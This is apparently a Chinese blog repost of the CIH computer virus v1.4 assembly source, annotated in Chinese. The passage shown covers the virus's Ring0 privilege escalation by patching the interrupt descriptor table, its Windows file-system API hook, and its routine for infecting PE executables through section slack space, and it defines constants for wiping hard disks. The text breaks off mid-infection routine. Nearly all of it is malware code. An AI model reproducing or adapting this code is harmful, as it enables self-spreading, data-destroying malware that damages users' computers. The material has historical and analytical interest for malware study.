CIH病毒-邹丹注释
生活随笔
收集整理的這篇文章主要介紹了
CIH病毒-邹丹注释
小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.
;CIH病毒1.4版本之中文注釋由"鄒丹"編寫(xiě)完成于1999-4-09
;源程序中的英文注釋未作修改,全部保留 .586P ;586保護(hù)模式匯編
; ****************************************************************************
; * Original PE Executable File(Don't Modify this Section) *
; ****************************************************************************
OriginalAppEXE SEGMENT FileHeader: ;編譯連接后的PE格式可執(zhí)行文件文件頭 db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h dd 00000000h, VirusSize OriginalAppEXE ENDS ; ****************************************************************************
; * My Virus Game *
; **************************************************************************** ; *********************************************************
; * Constant Define *
; ********************************************************* TRUE = 1
FALSE = 0
DEBUG = TRUE
MajorVirusVersion = 1 ;主版本號(hào)
MinorVirusVersion = 4 ;副版本號(hào)
VirusVersion = MajorVirusVersion*10h+MinorVirusVersion ;合成版本號(hào) IF DEBUG ;是否是調(diào)試用 FirstKillHardDiskNumber = 81h ;殺掉第二個(gè)硬盤(pán)“d:” HookExceptionNumber = 05h ;使用5號(hào)中斷
ELSE FirstKillHardDiskNumber = 80h ;殺掉第一個(gè)硬盤(pán)“c:” HookExceptionNumber = 03h ;使用3號(hào)中斷
ENDIF FileNameBufferSize = 7fh ; *********************************************************
; ********************************************************* VirusGame SEGMENT ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame ; *********************************************************
; * Ring3 Virus Game Initial Program *
; ********************************************************* MyVirusStart: push ebp ; *************************************
; * Let's Modify Structured Exception *
; * Handing, Prevent Exception Error *
; * Occurrence, Especially in NT. *
; ************************************* lea eax, [esp-04h*2] xor ebx, ebx xchg eax, fs:[ebx] call @0
@0: pop ebx ;獲取程序起始偏移量? ;用此偏移量+相對(duì)偏移量獲得絕對(duì)地址(病毒程序大量用到) lea ecx, StopToRunVirusCode-@0[ebx] push ecx push eax ; *************************************
; * Let's Modify *
; * IDT(Interrupt Descriptor Table) *
; * to Get Ring0 Privilege... *
; ************************************* push eax ; sidt [esp-02h] ; Get IDT Base Address ?;獲得中斷描述符表的基址到ebx pop ebx ; add ebx, HookExceptionNumber*08h+04h ; ZF = 0 ;計(jì)算要用中斷的基址到ebx cli ;在改表項(xiàng)前關(guān)中斷? mov ebp, [ebx] ; Get Exception Base mov bp, [ebx-04h] ; Entry Point ?;取得中斷基址到ebp lea esi, MyExceptionHook-@1[ecx] push esi ?;esi為病毒中斷例程地址 mov [ebx-04h], si ; shr esi, 16 ; Modify Exception mov [ebx+02h], si ; Entry Point Address;修改中斷基址使指向病毒中斷例程 pop esi ; *************************************
; * Generate Exception to Get Ring0 *
; ************************************* int HookExceptionNumber ; GenerateException;以中斷的方式進(jìn)入0級(jí)
ReturnAddressOfEndException = $ ; *************************************
; * Merge All Virus Code Section *
; ************************************* push esi mov esi, eax ;esi指向病毒開(kāi)始處 LoopOfMergeAllVirusCodeSection: mov ecx, [eax-04h] rep movsb ;拷貝病毒代碼到分配好的系統(tǒng)內(nèi)存首址 sub eax, 08h mov esi, [eax] or esi, esi jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1 ;拷貝結(jié)束 jmp LoopOfMergeAllVirusCodeSection ;拷貝下一段 QuitLoopOfMergeAllVirusCodeSection: pop esi ; *************************************
; * Generate Exception Again *
; ************************************* int HookExceptionNumber ; GenerateException Aga ;再一次進(jìn)入0級(jí) ; *************************************
; * Let's Restore *
; * Structured Exception Handing *
; ************************************* ReadyRestoreSE: sti ;開(kāi)中斷 xor ebx, ebx jmp RestoreSE ; *************************************
; * When Exception Error Occurs, *
; * Our OS System should be in NT. *
; * So My Cute Virus will not *
; * Continue to Run, it Jmups to *
; * Original Application to Run. *
; ************************************* StopToRunVirusCode:
@1 = StopToRunVirusCode xor ebx, ebx mov eax, fs:[ebx] mov esp, [eax] RestoreSE: pop dword ptr fs:[ebx] pop eax ; *************************************
; * Return Original App to Execute *
; ************************************* pop ebp push 00401000h ; Push Original
OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack ;把原程序的開(kāi)始地址壓棧 ret ; Return to Original App Entry Point ;以子程序返回形式返回到原程序的開(kāi)始處 ; *********************************************************
; * Ring0 Virus Game Initial Program *
; ********************************************************* MyExceptionHook:
@2 = MyExceptionHook jz InstallMyFileSystemApiHook ;如果病毒代碼已拷貝好了 ;轉(zhuǎn)到安裝文件系統(tǒng)鉤子的程序
; *************************************
; * Do My Virus Exist in System !? *
; ************************************* mov ecx, dr0 ;察看dr0是否設(shè)置過(guò)(dr0為病毒駐留標(biāo)志) jecxz AllocateSystemMemoryPage ;沒(méi)有設(shè)置,則分配系統(tǒng)內(nèi)存 add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException ; *************************************
; * Return to Ring3 Initial Program *
; ************************************* ExitRing0Init: mov [ebx-04h], bp ; shr ebp, 16 ; Restore Exception mov [ebx+02h], bp ; ;恢復(fù)原來(lái)的中斷基址 iretd ;中斷返回 ; *************************************
; * Allocate SystemMemory Page to Use *
; ************************************* AllocateSystemMemoryPage: mov dr0, ebx ; Set the Mark of My Virus Exist in System ;設(shè)置dr0,它是病毒駐留的標(biāo)志 push 00000000fh ; push ecx ; push 0ffffffffh ; push ecx ;調(diào)用方法ULONG EXTERN _PageAllocate(ULONG nPages, ULONG pType, ULONG VM, ;ULONG AlignMask, ULONG minPhys, ULONG maxPhys, ULONG *PhysAddr,;ULONG flags); push ecx ; push ecx ; push 000000001h ; push 000000002h ; int 20h ; VMMCALL _PageAllocate;VXD調(diào)用
_PageAllocate = $ ; dd 00010053h ; Use EAX, ECX, EDX, and flags add esp, 08h*04h ;恢復(fù)棧指針 xchg edi, eax ; EDI = SystemMemory Start Address ; EDI指向分配好的系統(tǒng)內(nèi)存首址 lea eax, MyVirusStart-@2[esi] ;eax指向病毒開(kāi)始處 iretd ; Return to Ring3 Initial Program ;退出中斷,回3級(jí)(回到"Merge All Virus Code Section") ; *************************************
; * Install My File System Api Hook *
; ************************************* InstallMyFileSystemApiHook: lea eax, FileSystemApiHook-@6[edi] ;指向文件系統(tǒng)鉤子程序首址 push eax ; int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHook
IFSMgr_InstallFileSystemApiHook = $ ; dd 00400067h ; Use EAX, ECX, EDX, and flags ;在調(diào)用后變?yōu)閏all [IFSMgr_InstallFileSystemApiHook] mov dr0, eax ; Save OldFileSystemApiHook Address ;保存原來(lái)的文件系統(tǒng)鉤子程序首址到dr0(改調(diào)用的返回值是前一個(gè)鏈值) pop eax ; EAX = FileSystemApiHook Address ; Save Old IFSMgr_InstallFileSystemApiHook Entry Point mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi] mov edx, [ecx] ;edx為IFSMgr_InstallFileSystemApiHook功能的地址 mov OldInstallFileSystemApiHook-@3[eax], edx ?;保存 ; Modify IFSMgr_InstallFileSystemApiHook Entry Point lea eax, InstallFileSystemApiHook-@3[eax] mov [ecx], eax ?;設(shè)置新的IFSMgr_InstallFileSystemApiHook功能調(diào)用的地址 ;使指向InstallFileSystemApiHook cli jmp ExitRing0Init ?;退出0級(jí)(int 3 or int 5) ; *********************************************************
; * Code Size of Merge Virus Code Section *
; ********************************************************* CodeSizeOfMergeVirusCodeSection = offset $ ; *********************************************************
; * IFSMgr_InstallFileSystemApiHook *
; ********************************************************* InstallFileSystemApiHook: ;新的IFSMgr_InstallFileSystemApiHook功能調(diào)用 push ebx call @4 ;
@4: ; pop ebx ; mov ebx, offset FileSystemApiHook ;獲得當(dāng)前指令的偏移地址 add ebx, FileSystemApiHook-@4 ;加上偏移的差=FileSystemApiHook的偏移 push ebx int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook ;調(diào)用VXD移去指向FileSystemApiHook的鉤子
IFSMgr_RemoveFileSystemApiHook = $ dd 00400068h ; Use EAX, ECX, EDX, and flags ;調(diào)用號(hào) pop eax ; Call Original IFSMgr_InstallFileSystemApiHook ; to Link Client FileSystemApiHook push dword ptr [esp+8] call OldInstallFileSystemApiHook-@3[ebx] ;調(diào)用原來(lái)的IFSMgr_InstallFileSystemApiHook功能設(shè)置鉤子 pop ecx push eax ; Call Original IFSMgr_InstallFileSystemApiHook ; to Link My FileSystemApiHook push ebx call OldInstallFileSystemApiHook-@3[ebx] ;調(diào)用原來(lái)的IFSMgr_InstallFileSystemApiHook功能設(shè)置鉤子 pop ecx mov dr0, eax ; Adjust OldFileSystemApiHook Address ;調(diào)整原來(lái)的地址 pop eax pop ebx ret ; *********************************************************
; * Static Data *
; ********************************************************* OldInstallFileSystemApiHook dd ? ;原來(lái)的InstallFileSystemApiHook調(diào)用的地址 ; *********************************************************
; * IFSMgr_FileSystemHook *
; ********************************************************* ; *************************************
; * IFSMgr_FileSystemHook Entry Point *
; ************************************* FileSystemApiHook: ;安裝好的文件系統(tǒng)鉤子
@3 = FileSystemApiHook pushad ;保存寄存器(20h長(zhǎng)) call @5 ;
@5: ; pop esi ; mov esi, offset ;esi為當(dāng)前指令的偏移 add esi, VirusGameDataStartAddress-@5 ;esi為FileSystemApiHook的偏移加上到VirusGameDataStartAddress的偏移之差=VirusGameDataStartAddress的偏移; *************************************
; * Is OnBusy !? *
; ************************************* test byte ptr (OnBusy-@6)[esi], 01h ; if ( OnBusy ) ;測(cè)試"忙"標(biāo)志jnz pIFSFunc ; goto pIFSFunc ;"忙"則轉(zhuǎn)到pIFSFunc; *************************************
; * Is OpenFile !? *
; ************************************* ; if ( NotOpenFile ) ; goto prevhook lea ebx, [esp+20h+04h+04h] ;ebx為FunctionNum的地址
;文件系統(tǒng)鉤子的調(diào)用格式如下
;FileSystemApiHookFunction(pIFSFunc FSDFnAddr, int FunctionNum, int Drive,int ResourceFlags, int CodePage, pioreq pir);助標(biāo)2 cmp dword ptr [ebx], 00000024h ;測(cè)試此次調(diào)用是否是為了打開(kāi)文件;在DDK的ifs.h中定義的#define IFSFN_OPEN 36 jne prevhook ;不是就跳到前一個(gè)文件鉤子去 ; *************************************
; * Enable OnBusy *
; ************************************* inc byte ptr (OnBusy-@6)[esi] ; Enable OnBusy ;設(shè)置"忙"標(biāo)志為"忙" ; *************************************
; * Get FilePath's DriveNumber, *
; * then Set the DriveName to *
; * FileNameBuffer. *
; *************************************
; * Ex. If DriveNumber is 03h, *
; * DriveName is 'C:'. *
; ************************************* ; mov esi, offset FileNameBuffer add esi, FileNameBuffer-@6 ;esi指向FileNameBuffer push esi ;保存之 mov al, [ebx+04h] ;ebx+4為int Drive的地址 cmp al, 0ffh ;是否是UNC(universal naming conventions)地址 je CallUniToBCSPath ;是就轉(zhuǎn) add al, 40h mov ah, ':' mov [esi], eax ;處理成"X:"的形式 inc esi inc esi ; *************************************
; * UniToBCSPath *
; *************************************
; * This Service Converts *
; * a Canonicalized Unicode Pathname * ;把Canonicalized Unicode的字符轉(zhuǎn)換為普通的BCS字符集
; * to a Normal Pathname in the *
; * Specified BCS Character Set. *
; *************************************
;調(diào)用方法 UniToBCSPath(unsigned char * pBCSPath, ParsedPath * pUniPath, unsigned int maxLength, int charSet)CallUniToBCSPath: push 00000000h ;字符集 push FileNameBufferSize ;字符長(zhǎng)度 mov ebx, [ebx+10h] mov eax, [ebx+0ch] add eax, 04h push eax ;Uni字符首址 push esi ;BCS字符首址 int 20h ; VXDCall UniToBCSPath ;調(diào)用UniToBCSPath
UniToBCSPath = $ dd 00400041h ;調(diào)用id add esp, 04h*04h ; *************************************
; * Is FileName '.EXE' !? *
; ************************************* ; cmp [esi+eax-04h], '.EXE' cmp [esi+eax-04h], 'EXE.' ;測(cè)試是否是*.EXE(可執(zhí)行)文件 pop esi jne DisableOnBusy IF DEBUG ; *************************************
; * Only for Debug *
; ************************************* ; cmp [esi+eax-06h], 'FUCK' cmp [esi+eax-06h], 'KCUF' ;如果是測(cè)試用途則測(cè)試是否是"FUCK.EXE" jne DisableOnBusy ENDIF ; *************************************
; * Is Open Existing File !? *
; ************************************* ; if ( NotOpenExistingFile ) ; goto DisableOnBusy cmp word ptr [ebx+18h], 01h ;測(cè)試是否打開(kāi) jne DisableOnBusy ; *************************************
; * Get Attributes of the File *
; ************************************* mov ax, 4300h ;IFSMgr_Ring0_FileIO的獲得文件屬性號(hào)(R0_FILEATTRIBUTES/GET_ATTRIBUTES) int 20h ; VXDCall IFSMgr_Ring0_FileIO ;調(diào)用IFSMgr_Ring0_FileIO的獲得文件屬性的功能
IFSMgr_Ring0_FileIO = $ dd 00400032h ;調(diào)用號(hào) jc DisableOnBusy ;失敗否? push ecx ; *************************************
; * Get IFSMgr_Ring0_FileIO Address *
; ************************************* mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi] mov edi, [edi] ;獲得IFSMgr_Ring0_FileIO調(diào)用的地址 ; *************************************
; * Is Read-Only File !? *
; ************************************* test cl, 01h jz OpenFile ;測(cè)試是否是只讀文件 ; *************************************
; * Modify Read-Only File to Write *
; ************************************* mov ax, 4301h ;IFSMgr_Ring0_FileIO的獲得文件屬性號(hào)(R0_FILEATTRIBUTES/SET_ATTRIBUTES ) xor ecx, ecx call edi ; VXDCall IFSMgr_Ring0_FileIO ;調(diào)用IFSMgr_Ring0_FileIO的改文件屬性功能,使文件可寫(xiě); *************************************
; * Open File *
; ************************************* OpenFile: xor eax, eax mov ah, 0d5h ;IFSMgr_Ring0_FileIO的打開(kāi)文件功能號(hào)(R0_OPENCREATFILE or RO_OPENCREAT_IN_CONTEXT)xor ecx, ecx ;文件屬性 xor edx, edx inc edx mov ebx, edx inc ebx ;esi為文件名首址 call edi ; VXDCall IFSMgr_Ring0_FileIO ;調(diào)用IFSMgr_Ring0_FileIO的打開(kāi)文件功能 xchg ebx, eax ; mov ebx, FileHandle ;在ebx中保存文件句柄 ; *************************************
; * Need to Restore *
; * Attributes of the File !? *
; ************************************* pop ecx pushf test cl, 01h jz IsOpenFileOK ;是否需要恢復(fù)文件屬性(有寫(xiě)屬性就不需要恢復(fù)了) ; *************************************
; * Restore Attributes of the File *
; ************************************* mov ax, 4301h ;IFSMgr_Ring0_FileIO的獲得文件屬性號(hào)(R0_FILEATTRIBUTES/SET_ATTRIBUTES) call edi ; VXDCall IFSMgr_Ring0_FileIO ;恢復(fù)文件屬性 ; *************************************
; * Is Open File OK !? *
; ************************************* IsOpenFileOK: popf jc DisableOnBusy ;打開(kāi)是否成功? ; *************************************
; * Open File Already Succeed. ^__^ *
; ************************************* push esi ; Push FileNameBuffer Address to Stack ;把文件名數(shù)據(jù)區(qū)首址壓棧 pushf ; Now CF = 0, Push Flag to Stack ;保存標(biāo)志位 add esi, DataBuffer-@7 ; mov esi, offset DataBuffer ;esi指向數(shù)據(jù)區(qū)首址 ; ***************************
; * Get OffsetToNewHeader *
; *************************** xor eax, eax mov ah, 0d6h ;IFSMgr_Ring0_FileIO的讀文件功能號(hào)(R0_READFILE) ; For Doing Minimal VirusCode's Length, ; I Save EAX to EBP. mov ebp, eax push 00000004h ;讀取4個(gè)字節(jié) pop ecx push 0000003ch ;讀取dos文件頭偏移3ch處的Windows文件頭首部偏移 pop edx call edi ; VXDCall IFSMgr_Ring0_FileIO ;讀文件到esi mov edx, [esi] ;Windows文件頭首部偏移放到edx ; ***************************
; * Get 'PE\0' Signature *
; * of ImageFileHeader, and *
; * Infected Mark. *
; *************************** dec edx mov eax, ebp ;功能號(hào) call edi ; VXDCall IFSMgr_Ring0_FileIO ;讀文件到esi ; ***************************
; * Is PE !? *
; ***************************
; * Is the File *
; * Already Infected !? *
; ***************************
; * WinZip Self-Extractor *
; * doesn't Have Infected *
; * Mark Because My Virus *
; * doesn't Infect it. *
; *************************** ; cmp [esi], '\0PE\0' cmp dword ptr [esi], 00455000h ;判斷是否是PE文件(標(biāo)志"PE\0\0") jne CloseFile ;不是就關(guān)閉文件 ; *************************************
; * The File is ^o^ *
; * PE(Portable Executable) indeed. *
; *************************************
; * The File isn't also Infected. *
; ************************************* ; *************************************
; * Start to Infect the File *
; *************************************
; * Registers Use Status Now : *
; * *
; * EAX = 04h *
; * EBX = File Handle *
; * ECX = 04h *
; * EDX = 'PE\0\0' Signature of *
; * ImageFileHeader Pointer's *
; * Former Byte. *
; * ESI = DataBuffer Address ==> @8 *
; * EDI = IFSMgr_Ring0_FileIO Address *
; * EBP = D600h ==> Read Data in File *
; *************************************
; * Stack Dump : *
; * *
; * ESP => ------------------------- *
; * | EFLAG(CF=0) | *
; * ------------------------- *
; * | FileNameBufferPointer | *
; * ------------------------- *
; * | EDI | *
; * ------------------------- *
; * | ESI | *
; * ------------------------- *
; * | EBP | *
; * ------------------------- *
; * | ESP | *
; * ------------------------- *
; * | EBX | *
; * ------------------------- *
; * | EDX | *
; * ------------------------- *
; * | ECX | *
; * ------------------------- *
; * | EAX | *
; * ------------------------- *
; * | Return Address | *
; * ------------------------- *
; ************************************* push ebx ; Save File Handle ;保存文件句柄 push 00h ; Set VirusCodeSectionTableEndMark ; ***************************
; * Let's Set the *
; * Virus' Infected Mark *
; *************************** push 01h ; Size push edx ; Pointer of File ;edx指向PE文件頭偏移00h push edi ; Address of Buffer ;edi為IFSMgr_Ring0_FileIO的地址(原注釋有誤) ; ***************************
; * Save ESP Register *
; *************************** mov dr1, esp ; ***************************
; * Let's Set the *
; * NewAddressOfEntryPoint *
; * ( Only First Set Size ) *
; *************************** push eax ; Size ; ***************************
; * Let's Read *
; * Image Header in File *
; *************************** mov eax, ebp mov cl, SizeOfImageHeaderToRead ;要讀2個(gè)字節(jié)(WORD NumberOfSections) add edx, 07h ; Move EDX to NumberOfSections ;PE文件頭+07h為NumberOfSections(塊個(gè)數(shù)) call edi ; VXDCall IFSMgr_Ring0_FileIO ;讀出NumberOfSections(塊個(gè)數(shù))到esi ; ***************************
; * Let's Set the *
; * NewAddressOfEntryPoint *
; * ( Set Pointer of File, *
; * Address of Buffer ) *
; *************************** lea eax, (AddressOfEntryPoint-@8)[edx] push eax ; Pointer of File lea eax, (NewAddressOfEntryPoint-@8)[esi] push eax ; Address of Buffer ; ***************************
; * Move EDX to the Start *
; * of SectionTable in File *
; *************************** movzx eax, word ptr (SizeOfOptionalHeader-@8)[esi] lea edx, [eax+edx+12h] ;edx為SectionTable的偏移 ; ***************************
; * Let's Get *
; * Total Size of Sections *
; *************************** mov al, SizeOfScetionTable ;每個(gè)塊表項(xiàng)(ScetionTable)的大小(字節(jié)) ; I Assume NumberOfSections <= 0ffh mov cl, (NumberOfSections-@8)[esi] mul cl ;每個(gè)塊表項(xiàng)乘以塊個(gè)數(shù)=塊表大小 ; ***************************
; * Let's Set Section Table *
; *************************** ; Move ESI to the Start of SectionTable lea esi, (StartOfSectionTable-@8)[esi] ;esi指向塊表首址(在病毒動(dòng)態(tài)數(shù)據(jù)區(qū)中) push eax ; Size ;塊表大小 push edx ; Pointer of File ;edx為SectionTable的偏移 push esi ; Address of Buffer ; ; ***************************
; * The Code Size of Merge *
; * Virus Code Section and *
; * Total Size of Virus *
; * Code Section Table Must *
; * be Small or Equal the *
; * Unused Space Size of *
; * Following Section Table *
; *************************** inc ecx push ecx ; Save NumberOfSections+1 shl ecx, 03h ;*8 push ecx ; Save TotalSizeOfVirusCodeSectionTable ;預(yù)留病毒塊表空間 add ecx, eax add ecx, edx ;ecx+文件的正文的偏移 sub ecx, (SizeOfHeaders-@9)[esi] not ecx inc ecx ;求補(bǔ) ;ecx為文件頭大小-正文的偏移=未用空間 ; Save My Virus First Section Code ; Size of Following Section Table... ; ( Not Include the Size of Virus Code Section Table ) push ecx xchg ecx, eax ; ECX = Size of Section Table ;ecx為塊表大小 ; Save Original Address of Entry Point mov eax, (AddressOfEntryPoint-@9)[esi] ;入口RVA地址 add eax, (ImageBase-@9)[esi] ;裝入基址 mov (OriginalAddressOfEntryPoint-@9)[esi], eax ;保存裝入后實(shí)際的入口地址 cmp word ptr [esp], small CodeSizeOfMergeVirusCodeSection ;未用空間和病毒第一塊大小比較jl OnlySetInfectedMark ;小于就只設(shè)感染標(biāo)志; ***************************
; * Read All Section Tables *
; *************************** mov eax, ebp ;讀的功能號(hào) call edi ; VXDCall IFSMgr_Ring0_FileIO ;讀塊表到esi(@9處) ; ***************************
; * Full Modify the Bug : *
; * WinZip Self-Extractor *
; * Occurs Error... *
; ***************************
; * So When User Opens *
; * WinZip Self-Extractor, *
; * Virus Doesn't Infect it.*
; ***************************
; * First, Virus Gets the *
; * PointerToRawData in the *
; * Second Section Table, *
; * Reads the Section Data, *
; * and Tests the String of *
; * 'WinZip(R)'...... *
; *************************** xchg eax, ebp push 00000004h pop ecx ;讀4字節(jié) push edx mov edx, (SizeOfScetionTable+PointerToRawData-@9)[ebx] ;edx為第二塊的偏移(.rdata) add edx, 12h ;加10h+2h(10h處為"WinZip....") call edi ; VXDCall IFSMgr_Ring0_FileIO ;讀4字節(jié)到esi ; cmp [esi], 'nZip' cmp dword ptr [esi], 'piZn' ;判斷是否是WinZip自解壓文件 je NotSetInfectedMark ;是就不設(shè)置感染標(biāo)志 pop edx ;edx指向塊表在文件中首址 ; ***************************
; * Let's Set Total Virus *
; * Code Section Table *
; *************************** ; EBX = My Virus First Section Code ; Size of Following Section Table pop ebx ; 未用空間大小 pop edi ; EDI = TotalSizeOfVirusCodeSectionTabl pop ecx ; ECX = NumberOfSections+1 push edi ; Size add edx, ebp ; ebp為塊表大小 push edx ; Pointer of File ;指向塊表后(第一塊) add ebp, esi ; ebp指向病毒數(shù)據(jù)區(qū)的塊表后(第一塊) push ebp ; Address of Buffer ; ***************************
; * Set the First Virus *
; * Code Section Size in *
; * VirusCodeSectionTable *
; *************************** lea eax, [ebp+edi-04h] mov [eax], ebx ;設(shè)置病毒代碼第一塊的大小(未用空間大小)到病毒塊表 ; ***************************
; * Let's Set My Virus *
; * First Section Code *
; *************************** push ebx ; Size ;病毒代碼第一塊的大小(未用空間大小) add edx, edi push edx ; Pointer of File ;指向塊表后(第一塊)+Size??=病毒正文(病毒開(kāi)始處) lea edi, (MyVirusStart-@9)[esi] push edi ; Address of Buffer ;指向病毒開(kāi)始處 ; ***************************
; * Let's Modify the *
; * AddressOfEntryPoint to *
; * My Virus Entry Point *
; *************************** mov (NewAddressOfEntryPoint-@9)[esi], edx ;保存新的程序入口(病毒正文) ; ***************************
; * Setup Initial Data *
; *************************** lea edx, [esi-SizeOfScetionTable] ;edx先減一項(xiàng)塊表長(zhǎng)度,以配合下面的"助標(biāo)1"mov ebp, offset VirusSize ;ebp為病毒長(zhǎng)度 jmp StartToWriteCodeToSections ; ***************************
; * Write Code to Sections *
; *************************** LoopOfWriteCodeToSections: add edx, SizeOfScetionTable ;助標(biāo)1: ;指向下一塊表項(xiàng) mov ebx, (SizeOfRawData-@9)[edx] ;ebx為該塊表項(xiàng)的SizeOfRawData(塊大小) sub ebx, (VirtualSize-@9)[edx] ;減去VirtualSize=該塊未用空間 jbe EndOfWriteCodeToSections push ebx ; Size sub eax, 08h mov [eax], ebx ;寫(xiě)入病毒塊表 mov ebx, (PointerToRawData-@9)[edx] ;ebx為塊的物理(實(shí)際)偏移? add ebx, (VirtualSize-@9)[edx] ;加上VirtualSize push ebx ; Pointer of File ;ebx指向該塊未用空間的文件指針 push edi ; Address of Buffer mov ebx, (VirtualSize-@9)[edx] add ebx, (VirtualAddress-@9)[edx] add ebx, (ImageBase-@9)[esi] ;ebx為該塊裝入后的實(shí)際地址 mov [eax+4], ebx ;保存到病毒塊表中 mov ebx, [eax] ;該塊未用空間大小 add (VirtualSize-@9)[edx], ebx ;加到該塊表項(xiàng)的VirtualSize; Section contains initialized data ==> 00000040h ; Section can be Read. ==> 40000000h or (Characteristics-@9)[edx], 40000040h ;改該塊表項(xiàng)的塊屬性(改為可讀,并包含初始化數(shù)據(jù)) StartToWriteCodeToSections: sub ebp, ebx ;病毒大小-病毒塊大小 jbe SetVirusCodeSectionTableEndMark ;如果小于(病毒插入完畢)就設(shè)置病毒塊表結(jié)束符add edi, ebx ; Move Address of Buffer ;指向病毒下一塊 EndOfWriteCodeToSections: loop LoopOfWriteCodeToSections ; ***************************
; * Only Set Infected Mark *
; *************************** OnlySetInfectedMark: mov esp, dr1 ;只設(shè)置感染標(biāo)志 jmp WriteVirusCodeToFile ;跳到寫(xiě)病毒到要傳染的文件的程序 ; ***************************
; * Not Set Infected Mark *
; *************************** NotSetInfectedMark: add esp, 3ch ;不設(shè)置感染標(biāo)志 jmp CloseFile ;跳到關(guān)文件 ; ***************************
; * Set Virus Code *
; * Section Table End Mark *
; *************************** SetVirusCodeSectionTableEndMark: ; Adjust Size of Virus Section Code to Correct Value add [eax], ebp ;更正病毒塊表的最后一項(xiàng) add [esp+08h], ebp ; Set End Mark xor ebx, ebx mov [eax-04h], ebx ;設(shè)置塊表結(jié)束標(biāo)志 ; ***************************
; * When VirusGame Calls *
; * VxDCall, VMM Modifies *
; * the 'int 20h' and the *
; * 'Service Identifier' *
; * to 'Call [XXXXXXXX]'. *
; ***************************
; * Before Writing My Virus *
; * to File, I Must Restore *
; * them First. ^__^ *
